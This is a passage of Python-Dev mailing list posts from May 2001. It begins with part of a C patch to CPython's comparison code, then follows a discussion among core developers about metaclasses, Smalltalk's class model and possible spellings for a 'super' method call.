+	    Py_DECREF(w);
+	    DPRINTF(" compare slot returned: %i",cmp);
+	    return PyInt_FromLong(cmp);
+    }
+    DPRINTF(" using type names for comparison\n");
+    return PyInt_FromLong(strcmp(v->ob_type->tp_name, 
+				 w->ob_type->tp_name));
+}
+
+PyObject *
+PyNumber_Compare(v, w)
+	PyObject *v, *w;
+{
+	DPRINTF("PyNumber_Compare(%s at 0x%lx, %s at 0x%lx);\n",
+		v->ob_type->tp_name,(long)v,
+		w->ob_type->tp_name,(long)w);
+	BINOP("__cmp__", "__rcmp__", PyNumber_Compare);
+	return _PyNumber_BinaryOperation(v,w,
+					 NB_SLOT(nb_cmp),
+					 "cmp()");
+}
+

[...]

+static PyObject *
+_PyNumber_BinaryOperation(PyObject *v,
+			  PyObject *w,
+			  const int op_slot,
+			  const char *operation)
+{
+	PyNumberMethods *mv, *mw;
+	register PyObject *x;
+	register binaryfunc *slot;
+	int c;
...
+	/* When using old coercion, make sure that the requested slot
+	   is available on old style numbers or use an emulation. */
+	if (op_slot > NB_SLOT(nb_hex)) {
+
+	    /* Emulation hooks: */
+	    if (op_slot == NB_SLOT(nb_cmp))
+		return _PyNumber_OldstyleCompare(v,w);
+
+	    goto badOperands;
+	}


[...]

 int
 PyObject_Compare(v, w)
 	PyObject *v, *w;
 {
 	PyTypeObject *tp;
@@ -291,27 +294,30 @@ PyObject_Compare(v, w)
 			Py_DECREF(res);
 			PyErr_SetString(PyExc_TypeError,
 					"comparison did not return an int");
 			return -1;
 		}
-		c = PyInt_AsLong(res);
+		c = PyInt_AS_LONG(res);
 		Py_DECREF(res);
 		return (c < 0) ? -1 : (c > 0) ? 1 : 0;	
 	}
 	if ((tp = v->ob_type) != w->ob_type) {
-		if (tp->tp_as_number != NULL &&
-				w->ob_type->tp_as_number != NULL) {
-			int err;
-			err = PyNumber_CoerceEx(&v, &w);
-			if (err < 0)
+		if (tp->tp_as_number != NULL ||
+		    w->ob_type->tp_as_number != NULL) {
+			PyObject *res;
+			int c;
+			res = PyNumber_Compare(v,w);
+			if (res == NULL)
 				return -1;
-			else if (err == 0) {
-				int cmp = (*v->ob_type->tp_compare)(v, w);
-				Py_DECREF(v);
-				Py_DECREF(w);
-				return cmp;
+			if (!PyInt_Check(res)) {
+			    PyErr_SetString(PyExc_TypeError,
+					"comparison did not return an int");
+			    return -1;
 			}
+			c = PyInt_AS_LONG(res);
+			Py_DECREF(res);
+			return (c < 0) ? -1 : (c > 0) ? 1 : 0;	
 		}
 		return strcmp(tp->tp_name, w->ob_type->tp_name);
 	}
 	if (tp->tp_compare == NULL)
 		return (v < w) ? -1 : 1;


-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Wed May  2 11:09:17 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 11:09:17 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
Message-ID: <3AEFCEBD.2E5979C9@lemburg.com>

Guido van Rossum wrote:
> 
> While implementing more class-like behavior for built-in types in the
> experimental descr-branch in the 2.2 CVS tree, I've noticed problems
> caused by Python's collapsing of class attributes and instance
> attributes.
> 
> For example, suppose d is a dictionary.  My experimental changes make
> d.__class__ return DictType (from the types module).
> (DictType.__class__ is TypeType, by the way.)  I also added special
> methods.  For example, d.__repr__() now returns repr(d).  I am
> preparing for subclassing of built-in types, so I will eventually be
> able to derive a class MyDictType from DictType, as follows:
> 
> class MyDictType(DictType):
>   ...
> 
> Now comes the fun part.  Suppose MyDictType wants to define its own
> repr():
> 
> class MyDictType(DictType):
>   def __repr__(self):
>     return "MyDictType(%s)" % DictType.__repr__(self)
> 
> But, (surprise, surprise!), DictType itself also has a __repr__()
> method: it returns the string "<type 'dictionary'>".
> 
> So the above code would fail: DictType.__repr__() returns
> repr(DictType), and DictType.__repr__(self) raises an argument count
> error.  The correct __repr__ method for dictionary objects can be
> found as DictType.__dict__['__repr__'], but that looks hideous!
> 
> What to do?  Pragmatically, I can make DictType.__repr__ return
> DictType.__dict__['__repr__'], and all will be well in this example.
> But we have to tread carefully here: DictType.__class__ is TypeType,
> but DictType.__dict__['__class__'] is a descriptor for the __class__
> attribute on dictionary objects.
> 
> The best rule I can think of so far is that DictType.__dict__ gives
> the *true* set of attribute descriptors for dictionary objects, and is
> thus similar to Smalltalks's class.methodDict that Jim describes
> below.  DictType.foo is a shortcut that can resolve to either
> DictType.__dict__['foo'] or to an attribute (maybe a method) of
> DictType described in TypeType.__dict__['foo'], whichever is defined.
> If both are defined, I propose the following, clumsy but backwards
> compatible rule: if DictType.__dict__['foo'] describes a method, it
> wins.  Otherwise, TypeType.__dict__['foo'] wins.

I'm not sure I can follow you here: DictType.__repr__ is the
representation method of the dictionary and not inherited
from TypeType, so there should be no problem.

The problem with the misleading error message would only show
up in case DictType does not define a __repr__ method. Then the
inherited one from TypeType would come into play and cause
the problem you mention above.

Thinking in terms of meta-classes, I believe we should implement
this mechanism in the meta-class (TypeType in this case). Its
__getattr__() will have to decide whether or not to expose its
own methods and attributes or not. 

The only catch here is that currently instances and classes have 
control of whether and how to bind found functions as methods or not. 
We should  probably change that to pass complete control over to the 
meta-class object and remove the special control flows currently found
in instance_getattr2() and class_lookup().

In general, I think that meta-classes should not expose their
attributes to the class objects they create, since this causes
way to many problems.

Perhaps I'm oversimplifying things here, but I have a feeling that
we can go a long way by actually trying to see meta-classes as 
first class members in the interpreter design and moving all the 
binding and lookup mechanisms over to this object type. The special 
casing should then take place in the meta-class rather than its 
creations.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From thomas.heller at ion-tof.com  Wed May  2 12:57:42 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 12:57:42 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz>  <200105020248.VAA30315@cj20424-a.reston1.va.home.com>
Message-ID: <038601c0d2f6$b6159770$e000a8c0@thomasnotebook>

> > The most common use for these seems to be for calling
> > inherited methods, so perhaps something like
> > 
> >    inherited MyBaseClass.foo(arg, ...)
> > 
> > which would be equivalent to
> > 
> >    getmethod(MyBaseClass, 'foo')(self, arg, ...)
> > 
> > where getmethod() is a new builtin like getattr()
> > except that it looks in the __classdict__, and 'self'
> > is really whatever the first argument of the containing
> > method was.
> 
> The second most common use is to reference class variables
> (e.g. imagine a class that keeps counters of how many instances have
> been created and deleted in C.initcount and C.delcount).  But these
> should not have to change, since they really are class attributes.
> 
> > Now that we have __future__, would such a change be contemplatable?
> > Or is it too radical to even think about?
> 
> If we can find a way to spell "super.method", we should be ready for
> the future.  I can't think of something right off the bat
> unfortunately.

Could we make

  super(self, MyBaseClass).foo(arg, ...)

behave similar to

  MyBaseClass.foo(self, arg, ...)

Wrapping this stuff in a function would probably also
enable to use the same pattern in existing python versions.

Thomas


From thomas.heller at ion-tof.com  Wed May  2 13:12:21 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 13:12:21 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
Message-ID: <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook>

> Jim Althoff (a big commercial user of J[P]ython) sent me a summary of
> how metaclasses work in Smalltalk.  He should know, since he invented
> them! :-)  I include it below, with his permission.

I found this very interesting reading.

[From Jim Althoff]
> In the list below, indentation indicates class hieararchy (superclass --
> subclass)
The indentation, unfortunately, seems to be destroyed.

> 
> plain-class
> ----------------
> <none>
> o Class
>    o  Object                                                   isInstanceOf
> o ObjectMetaClass                     isInstanceOf  MetaClass
>         o Class                                                isInstanceOf
> o ClassMetaClass                    isInstanceOf  MetaClass
>             o MetaClass                                  isInstanceOf
> o MetaClassMetaClass      isInstanceOf  MetaClass
>         . . .
>         o Rectangle                                        isInstanceOf
> o RectangleMetaClass          isInstanceOf  MetaClass
>             o SpecializedRectangle            isInstanceOf
> o SpecializedRectangleMetaClass  isInstanceOf  MetaClass

A question for Jim (this is more Smalltalk than Python related):
How does the Behaviour class fit into this picture?

Thhomas


From guido at digicool.com  Wed May  2 14:15:57 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 07:15:57 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 12:57:42 +0200."
             <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com>  
            <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> 
Message-ID: <200105021215.HAA31939@cj20424-a.reston1.va.home.com>

> > If we can find a way to spell "super.method", we should be ready for
> > the future.  I can't think of something right off the bat
> > unfortunately.
> 
> Could we make
> 
>   super(self, MyBaseClass).foo(arg, ...)
> 
> behave similar to
> 
>   MyBaseClass.foo(self, arg, ...)
> 
> Wrapping this stuff in a function would probably also
> enable to use the same pattern in existing python versions.

Yes, I can see how to write super() using current tools (or 1.5.2
even).  The problem is that this makes super calls even more wordy
than they already are!  I can't think of anything that wouldn't
require compiler support though.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From gward at python.net  Wed May  2 14:57:41 2001
From: gward at python.net (Greg Ward)
Date: Wed, 2 May 2001 08:57:41 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021215.HAA31939@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 02, 2001 at 07:15:57AM -0500
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>
Message-ID: <20010502085741.B515@gerg.ca>

On 02 May 2001, Guido van Rossum said:
> Yes, I can see how to write super() using current tools (or 1.5.2
> even).  The problem is that this makes super calls even more wordy
> than they already are!  I can't think of anything that wouldn't
> require compiler support though.

I was just doing some gedanken with various ways to spell "super", and I
think my favourite is the same as Java's (as I remember it):

class MyClass (BaseClass):
    def foo (self, arg1, arg2):
         super.foo(arg1, arg2)


Since I don't know much about Python's guts, I can't say how
implementable this is, but I like the spelling.  The semantics would be
something like this (with adjustments to the reality of Python's guts):

  * 'super' is a magic object that only makes sense inside a 'def'
    inside a 'class' (at least for now; perhaps it could be generalized
    to work at class scope as well as method scope, but let's keep
    it simple)

  * super's notional __getattr__() does something like this:
    - peek at the calling stack frame and fetch the calling function
      (MyClass.foo) and the first argument to that function (self)
    - [is this possible?] ensure that calling_function is a bound
      method, and that it's bound to the self object we just plucked
      from the stack; raise a "misuse of super object" exception if not
    - walk the superclass tree starting at self.__class__.__bases__
      (ie. skip self's class), looking for an object with the name
      passed to this __getattr__() call -- 'foo'
    - when found, return it
    - if not found, raise AttributeError

The ability to peek at the calling stack frame is essential to this
scheme, in order to fetch the "current object" (self) without needing to
have it explicitly passed.  Is this as bothersome from C as it is from
Python?

        Greg
-- 
Greg Ward - nerd                                        gward at python.net
http://starship.python.net/~gward/
In space, no one can hear you fart.


From mal at lemburg.com  Wed May  2 15:07:27 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 15:07:27 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>
Message-ID: <3AF0068F.32388C87@lemburg.com>

Greg Ward wrote:
> 
> On 02 May 2001, Guido van Rossum said:
> > Yes, I can see how to write super() using current tools (or 1.5.2
> > even).  The problem is that this makes super calls even more wordy
> > than they already are!  I can't think of anything that wouldn't
> > require compiler support though.
> 
> I was just doing some gedanken with various ways to spell "super", and I
> think my favourite is the same as Java's (as I remember it):
> 
> class MyClass (BaseClass):
>     def foo (self, arg1, arg2):
>          super.foo(arg1, arg2)
> 
> Since I don't know much about Python's guts, I can't say how
> implementable this is, but I like the spelling.  The semantics would be
> something like this (with adjustments to the reality of Python's guts):
> ...

This doesn't work in Python since Python has multiple inheritence,
e.g. super in 

class A(B,C):
	def foo(self):
		super.foo()

is ambiguous.

I'd rather suggest adding a function for finding the basemethod
of a method. This is probably the most common task in this context.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From thomas.heller at ion-tof.com  Wed May  2 15:12:40 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 15:12:40 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>
Message-ID: <049901c0d309$92c515d0$e000a8c0@thomasnotebook>

[Greg Ward]

> On 02 May 2001, Guido van Rossum said:
> > Yes, I can see how to write super() using current tools (or 1.5.2
> > even).  The problem is that this makes super calls even more wordy
> > than they already are!  I can't think of anything that wouldn't
> > require compiler support though.
> 
> I was just doing some gedanken with various ways to spell "super", and I
> think my favourite is the same as Java's (as I remember it):
> 
> class MyClass (BaseClass):
>     def foo (self, arg1, arg2):
>          super.foo(arg1, arg2)
> 
> 
> Since I don't know much about Python's guts, I can't say how
> implementable this is, but I like the spelling.  The semantics would be
> something like this (with adjustments to the reality of Python's guts):
> 
>   * 'super' is a magic object that only makes sense inside a 'def'
>     inside a 'class' (at least for now; perhaps it could be generalized
>     to work at class scope as well as method scope, but let's keep
>     it simple)
> 
>   * super's notional __getattr__() does something like this:
>     - peek at the calling stack frame and fetch the calling function
>       (MyClass.foo) and the first argument to that function (self)
>     - [is this possible?] ensure that calling_function is a bound
>       method, and that it's bound to the self object we just plucked
>       from the stack; raise a "misuse of super object" exception if not
>     - walk the superclass tree starting at self.__class__.__bases__
Caareful!
The search in the above context must start at MyClass.__bases__
which may not be the same as self.__class__.__bases__.

Thomas


From guido at digicool.com  Wed May  2 16:29:03 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 09:29:03 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 08:57:41 -0400."
             <20010502085741.B515@gerg.ca> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>  
            <20010502085741.B515@gerg.ca> 
Message-ID: <200105021429.JAA32055@cj20424-a.reston1.va.home.com>

[Greg Ward, welcome back!]
> I was just doing some gedanken with various ways to spell "super", and I
> think my favourite is the same as Java's (as I remember it):
> 
> class MyClass (BaseClass):
>     def foo (self, arg1, arg2):
>          super.foo(arg1, arg2)

I'm sure that's everybody's favorite way to spell it!  It's mine too. :-)

> Since I don't know much about Python's guts, I can't say how
> implementable this is, but I like the spelling.  The semantics would be
> something like this (with adjustments to the reality of Python's guts):
> 
>   * 'super' is a magic object that only makes sense inside a 'def'
>     inside a 'class' (at least for now; perhaps it could be generalized
>     to work at class scope as well as method scope, but let's keep
>     it simple)

Yes, that's about the only way it can be made to work.  The compiler
will have to (1) detect that 'super' is a free variable, and (2) make
it a local and initialize it with the proper magic.  Or, to relieve
the burden from the symbol table, we could make super a keyword, at
the cost of breaking existing code.

I don't think super is needed outside methods.

>   * super's notional __getattr__() does something like this:
>     - peek at the calling stack frame and fetch the calling function
>       (MyClass.foo) and the first argument to that function (self)
>     - [is this possible?] ensure that calling_function is a bound
>       method, and that it's bound to the self object we just plucked
>       from the stack; raise a "misuse of super object" exception if not

I don't think you can make that test, but making it a 'magic local'
as I suggested above would avoid the problem.

>     - walk the superclass tree starting at self.__class__.__bases__
>       (ie. skip self's class), looking for an object with the name
>       passed to this __getattr__() call -- 'foo'
>     - when found, return it
>     - if not found, raise AttributeError

Yup, that's the easy part. :-)

> The ability to peek at the calling stack frame is essential to this
> scheme, in order to fetch the "current object" (self) without needing to
> have it explicitly passed.  Is this as bothersome from C as it is from
> Python?

No, in C it's easy.  The problem is that there is no information in
the frame that tells you where the currently executing function was
defined -- all you have is the code object, which is
context-independent.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May  2 16:30:20 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 09:30:20 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 15:07:27 +0200."
             <3AF0068F.32388C87@lemburg.com> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>  
            <3AF0068F.32388C87@lemburg.com> 
Message-ID: <200105021430.JAA32075@cj20424-a.reston1.va.home.com>

> This doesn't work in Python since Python has multiple inheritence,
> e.g. super in 
> 
> class A(B,C):
> 	def foo(self):
> 		super.foo()
> 
> is ambiguous.

I'm not sure what you mean.  The search is totally well-defined: first
search B for a foo method, then search C.

> I'd rather suggest adding a function for finding the basemethod
> of a method. This is probably the most common task in this context.

I've never heard of the concept of basemethod, but if I may venture a
guess, it would be the same definition as I give above.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jeremy at digicool.com  Wed May  2 15:38:42 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Wed, 2 May 2001 09:38:42 -0400 (EDT)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021429.JAA32055@cj20424-a.reston1.va.home.com>
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz>
	<200105020248.VAA30315@cj20424-a.reston1.va.home.com>
	<038601c0d2f6$b6159770$e000a8c0@thomasnotebook>
	<200105021215.HAA31939@cj20424-a.reston1.va.home.com>
	<20010502085741.B515@gerg.ca>
	<200105021429.JAA32055@cj20424-a.reston1.va.home.com>
Message-ID: <15088.3554.953359.757584@slothrop.digicool.com>

>>>>> "GvR" == Guido van Rossum <guido at digicool.com> writes:

  >> Since I don't know much about Python's guts, I can't say how
  >> implementable this is, but I like the spelling.  The semantics
  >> would be something like this (with adjustments to the reality of
  >> Python's guts):
  >>
  >> * 'super' is a magic object that only makes sense inside a 'def'
  >> inside a 'class' (at least for now; perhaps it could be
  >> generalized to work at class scope as well as method scope, but
  >> let's keep it simple)

  GvR> Yes, that's about the only way it can be made to work.  The
  GvR> compiler will have to (1) detect that 'super' is a free
  GvR> variable, and (2) make it a local and initialize it with the
  GvR> proper magic.  Or, to relieve the burden from the symbol table,
  GvR> we could make super a keyword, at the cost of breaking existing
  GvR> code.

  GvR> I don't think super is needed outside methods.

It seems helpful to clarify here, since this came up in conversation
at PythonLabs just the other day with the yield statement.

If we try to avoid keywords, we have to take the "well, I don't see
anyone assigning to this name" route.  If the compiler does not detect
any assignment to a nearly reserved word, like super, it would give
the use of that word special meaning.

There are a bunch of little problems.  A module could (not necessarily
should) be designed to have a global name poked into its namespace;
this would break, because the name would already have transmogrified
from a regular variable into a special one.  The use of exec or import
star would make it impossible for the word to take on its special
meaning.

So keywords really are a lot clearer, but they have the potential to
be incompatible.

Jeremy


From fredrik at pythonware.com  Wed May  2 16:00:55 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Wed, 2 May 2001 16:00:55 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com>
Message-ID: <000d01c0d310$4ee127d0$0900a8c0@spiff>

guido wrote:

> > class MyClass (BaseClass):
> >     def foo (self, arg1, arg2):
> >          super.foo(arg1, arg2)
>
> I'm sure that's everybody's favorite way to spell it!

not mine.  my brain contains far too much Python 1.5.2 code
for it to accept that some variables are dynamically scoped,
while others are lexically scoped.

why not spell it out:

    self.__super__.foo(arg1, arg2)

or

    self.super.foo(arg1, arg2)

or

    super(self).foo(arg1, arg2)

> Or, to relieve the burden from the symbol table, we could make super
> a keyword, at the cost of breaking existing code.

hey, how about introducing $ as a keyword prefix for newly introduced
keywords?

    $super.foo(arg1, arg2)

(this can of course be mapped to either of my previous suggestions;
"$foo" either means "self.foo" or "foo(self)"...)

and to save a little typing, only use it for keywords that start with
an "s" (should leave us plenty of expansion room):

    $uper.foo(arg1, arg2)

otoh, if "super" is common enough to motivate introducing magic objects
into python, maybe "$" should mean "super."?

    $foo(arg1, arg2)

and while we're at it, let's introduce "@" for "self.".

gotta run -- time for my monthly reboot /F


From guido at digicool.com  Wed May  2 17:03:37 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:03:37 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 11:09:17 +0200."
             <3AEFCEBD.2E5979C9@lemburg.com>
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
            <3AEFCEBD.2E5979C9@lemburg.com>
Message-ID: <200105021503.KAA32203@cj20424-a.reston1.va.home.com>

[me]
> > The best rule I can think of so far is that DictType.__dict__ gives
> > the *true* set of attribute descriptors for dictionary objects, and is
> > thus similar to Smalltalks's class.methodDict that Jim describes
> > below.  DictType.foo is a shortcut that can resolve to either
> > DictType.__dict__['foo'] or to an attribute (maybe a method) of
> > DictType described in TypeType.__dict__['foo'], whichever is defined.
> > If both are defined, I propose the following, clumsy but backwards
> > compatible rule: if DictType.__dict__['foo'] describes a method, it
> > wins.  Otherwise, TypeType.__dict__['foo'] wins.

[MAL]
> I'm not sure I can follow you here: DictType.__repr__ is the
> representation method of the dictionary and not inherited
> from TypeType, so there should be no problem.

The problem is that both a dictionary object (call it d) and its type
(DictType) have a __repr__ method: repr(d) returns "d", and
repr(DictType) returns "<type 'dictionary'>".

Given the analogy with classes, where str(x) invokes x.__str__() and
x.__str__() can also be called directly, it is not unreasonable to
expect that this works in general, so that repr(d) can be spelled as

    d.__repr__()

and repr(DictType) as

    DictType.__repr__()

And, given another analogy with classes, where x.foo() is equivalent
to x.__class__.foo(x), the two forms above should also be equivalent
to

    d.__class__.__repr__(d)

and

    DictType.__class__.__repr__(DictType)

But since d.__class__ is DictType, we now have two conflicting ways to
derive a meaning for DictType.__repr__: the first one going

    repr(DictType) => DictType.__repr__()

and the second one going

    repr(d) => d.__class__.__repr__(d) => DictType.__repr__(d)

The rule quoted above chooses the second meaning, from the very
pragmatic point that once I allow subclassing from DictType, such a
subclass might very well want to override __repr__ to wrap the base
class __repr__, and the conventional way to reference that (barring
the implementation of 'super') is DictType.__repr__.  Direct
invocation of an object's own __repr__ method as x.__repr__() is much
les common.  The implementation of repr(x) can do the right thing,
which is to look for x.__class__.__dict__['__repr__'].

> The problem with the misleading error message would only show
> up in case DictType does not define a __repr__ method. Then the
> inherited one from TypeType would come into play and cause
> the problem you mention above.

No, the issue is not inheritance: I haven't implemented inheritance
yet.  DictType is an instance of TypeType but doesn't inherit from it.

> Thinking in terms of meta-classes, I believe we should implement
> this mechanism in the meta-class (TypeType in this case). Its
> __getattr__() will have to decide whether or not to expose its
> own methods and attributes or not.

That's exactly how I solved it: type_getattro() implements the rule
quoted at the top.

> The only catch here is that currently instances and classes have
> control of whether and how to bind found functions as methods or not.
> We should  probably change that to pass complete control over to the
> meta-class object and remove the special control flows currently found
> in instance_getattr2() and class_lookup().

Um, yeah, that's where I think this will end up causing more trouble.

Right now, if x is an instance, some attributes like x.__class__ and
x.__dict__ special-cased in instance_getattr().  The mechanism I
propose removes the need for (most of) such special cases, and instead
allows the class to provide "descriptors" for instance attributes.
So, for example, if instances of a class C have an attribute named
foo, C.__dict__['foo'] contains the descriptor for that attribute, and
that is how the implementation decides how to interpret x.foo
(assuming x is an instance of C).  We may be able to access this same
descriptor as C.foo, but that's really only important for backwards
compatibility with the way classes work today.

> In general, I think that meta-classes should not expose their
> attributes to the class objects they create, since this causes
> way to many problems.

I agree.

> Perhaps I'm oversimplifying things here, but I have a feeling that
> we can go a long way by actually trying to see meta-classes as
> first class members in the interpreter design and moving all the
> binding and lookup mechanisms over to this object type. The special
> casing should then take place in the meta-class rather than its
> creations.

Yes, that's where I'm heading!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May  2 16:02:41 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 16:02:41 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>  
	            <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>
Message-ID: <3AF01381.592AE31B@lemburg.com>

Guido van Rossum wrote:
> 
> > This doesn't work in Python since Python has multiple inheritence,
> > e.g. super in
> >
> > class A(B,C):
> >       def foo(self):
> >               super.foo()
> >
> > is ambiguous.
> 
> I'm not sure what you mean.  The search is totally well-defined: first
> search B for a foo method, then search C.

I thought you were talking about an abstract super class which is
how Java uses this term. 

Rereading some of the posts, I think you are indeed referring to
the method which foo overrides -- this is what I call basemethod
(since it is implemented in one of the base classes).
 
> > I'd rather suggest adding a function for finding the basemethod
> > of a method. This is probably the most common task in this context.
> 
> I've never heard of the concept of basemethod, but if I may venture a
> guess, it would be the same definition as I give above.

The basemethod can be defined as the first method of the same name
found in the inheritence tree using the standard Python lookup 
strategy (left-right, depth first) when continuing the lookup search
at the node in the inheritence tree which defines the method querying
the basemethod.

In other words: you let Python continue the search for the method
as if it hadn't found the occurrance calling the bsaemethod()
API. Hmm, still not clear enough... better let Tim jump in here
(we've had a discussion about basemethod() some months or years
ago). Tim ?

Note that there are many ways of defining what a basemethod
is, due to the ambiguities that are caused by multiple inheritence
(e.g. the same base class may appear in different branches of the
inheritence tree).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Wed May  2 17:05:30 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:05:30 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 16:00:55 +0200."
             <000d01c0d310$4ee127d0$0900a8c0@spiff> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com>  
            <000d01c0d310$4ee127d0$0900a8c0@spiff> 
Message-ID: <200105021505.KAA32231@cj20424-a.reston1.va.home.com>

> guido wrote:
> 
> > > class MyClass (BaseClass):
> > >     def foo (self, arg1, arg2):
> > >          super.foo(arg1, arg2)
> >
> > I'm sure that's everybody's favorite way to spell it!
> 
> not mine.  my brain contains far too much Python 1.5.2 code
> for it to accept that some variables are dynamically scoped,
> while others are lexically scoped.
> 
> why not spell it out:
> 
>     self.__super__.foo(arg1, arg2)
> 
> or
> 
>     self.super.foo(arg1, arg2)
> 
> or
> 
>     super(self).foo(arg1, arg2)
> 
> > Or, to relieve the burden from the symbol table, we could make super
> > a keyword, at the cost of breaking existing code.
> 
> hey, how about introducing $ as a keyword prefix for newly introduced
> keywords?
> 
>     $super.foo(arg1, arg2)
> 
> (this can of course be mapped to either of my previous suggestions;
> "$foo" either means "self.foo" or "foo(self)"...)
> 
> and to save a little typing, only use it for keywords that start with
> an "s" (should leave us plenty of expansion room):
> 
>     $uper.foo(arg1, arg2)
> 
> otoh, if "super" is common enough to motivate introducing magic objects
> into python, maybe "$" should mean "super."?
> 
>     $foo(arg1, arg2)
> 
> and while we're at it, let's introduce "@" for "self.".
> 
> gotta run -- time for my monthly reboot /F

LOL!  But you forgot the spelling of

    self.__super.foo(arg1, arg2)

which would pass in the class name that's the other necessary input to
a proper implementation of super. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May  2 16:04:29 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 16:04:29 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>  
